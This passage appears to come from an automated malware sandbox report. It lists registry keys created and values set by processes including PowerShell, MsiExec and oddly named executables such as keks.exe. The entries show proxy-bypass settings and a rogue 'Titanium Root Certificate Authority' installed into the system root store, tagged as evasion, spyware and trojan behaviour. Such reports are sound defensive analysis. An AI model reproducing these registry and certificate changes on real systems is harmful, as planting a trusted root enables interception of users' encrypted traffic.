Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00AE6AF4-00A7-4104-0009-49BC00B2DA80}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{101AE042-1A29-4A19-92CF-02285773F3B5}\ = "INATNetworkChangedEvent" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{431685DA-3618-4EBC-B038-833BA829B4B2}\TypeLib C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{01510F40-C196-4D26-B8DB-4C8C389F1F82}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{101AE042-1A29-4A19-92CF-02285773F3B5}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{20479EAF-D8ED-44CF-85AC-C83A26C95A4D}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{269D8F6B-FA1E-4CEE-91C7-6D8496BEA3C1}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{0F7B8A22-C71F-4A36-8E5F-A77D01D76090}\TypeLib C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{14C2DB8A-3EE4-11E9-B872-CB9447AAD965} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{21637B0E-34B8-42D3-ACFB-7E96DAF77C22}\NumMethods\ = "14" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2405F0E5-6588-40A3-9B0A-68C05BA52C4B}\NumMethods\ = "15" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{3E14C189-4A75-437E-B0BB-7E7C90D0DF2A}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{455F8C45-44A0-A470-BA20-27890B96DBA9}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{01510F40-C196-4D26-B8DB-4C8C389F1F82}\ = "IVirtualSystemDescription" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{08E25756-08A2-41AF-A05F-D7C661ABAEBE}\NumMethods C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CA2ADBA-8F30-401B-A8CD-FE31DBE839C0}\ = "IEvent" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4132147B-42F8-CD96-7570-6A8800E3342C}\ = "IDnDBase" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{46735DE7-F4C4-4020-A185-0D2881BCFA8B}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{4FDEBBF0-BE30-49C0-B315-E9749E1BDED1} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{22363CFC-07DA-41EC-AC4A-3DD99DB35594} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{327E3C00-EE61-462F-AED3-0DFF6CBF9904}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4132147B-42F8-CD96-7570-6A8800E3342C}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{59A235AC-2F1A-4D6C-81FC-E3FA843F49AE}\NumMethods\ = "38" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{027BC463-929C-40E8-BF16-FEA557CD8E7E}\TypeLib C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{101AE042-1A29-4A19-92CF-02285773F3B5}\TypeLib C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{16CED992-5FDC-4ABA-AFF5-6A39BBD7C38B}\NumMethods C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2405F0E5-6588-40A3-9B0A-68C05BA52C4B}\ = "IGuestProcessEvent" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{24EEF068-C380-4510-BC7C-19314A7352F1}\NumMethods C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2514881B-23D0-430A-A7FF-7ED7F05534BC}\NumMethods\ = "22" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32\ = "C:\\Program Files\\Oracle\\VirtualBox\\x86\\VBoxProxyStub-x86.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{027BC463-929C-40E8-BF16-FEA557CD8E7E}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{245D88BD-800A-40F8-87A6-170D02249A55}\TypeLib C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{50CE4B51-0FF7-46B7-A138-3C6E5AC946B4}\NumMethods C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\AppID = "{819B4D85-9CEE-493C-B6FC-64FFE759B3C9}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{01ADB2D6-AEDF-461C-BE2C-99E91BDAD8A1} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{101AE042-1A29-4A19-92CF-02285773F3B5}\NumMethods C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{22363CFC-07DA-41EC-AC4A-3DD99DB35594}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{3F63597A-26F1-4EDB-8DD2-6BDDD0912368} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5094F67A-8084-11E9-B185-DBE296E54799}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{455F8C45-44A0-A470-BA20-27890B96DBA9}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VirtualBox.Session\CurVer\ = "VirtualBox.Session.1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0F7B8A22-C71F-4A36-8E5F-A77D01D76090}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{245D88BD-800A-40F8-87A6-170D02249A55}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{327E3C00-EE61-462F-AED3-0DFF6CBF9904} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3890B2C8-604D-11E9-92D3-53CB473DB9FB}\NumMethods\ = "12" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4DA2DEC7-71B2-4817-9A64-4ED12C17388E}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0B3CDEB2-808E-11E9-B773-133D9330F849}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0DE887F2-B7DB-4616-AAC6-CFB94D89BA78}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{10CD08D0-E8B8-4838-B10C-45BA193734C1}\NumMethods C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{39B4E759-1EC0-4C0F-857F-FBE2A737A256}\NumMethods\ = "16" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4376693C-CF37-453B-9289-3B0F521CAF27}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{5748F794-48DF-438D-85EB-98FFD70D18C9} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\VersionIndependentProgID C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{0CA2ADBA-8F30-401B-A8CD-FE31DBE839C0}\NumMethods C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{0DE887F2-B7DB-4616-AAC6-CFB94D89BA78}\NumMethods C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{35CF4B3F-4453-4F3E-C9B8-5686939C80B6}\TypeLib C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{101AE042-1A29-4A19-92CF-02285773F3B5} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{22363CFC-07DA-41EC-AC4A-3DD99DB35594}\NumMethods C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{269D8F6B-FA1E-4CEE-91C7-6D8496BEA3C1}\NumMethods C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{334DF94A-7556-4CBC-8C04-043096B02D82}\NumMethods C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50CE4B51-0FF7-46B7-A138-3C6E5AC946B4}\TypeLib\Version = "1.3" C:\Windows\system32\msiexec.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971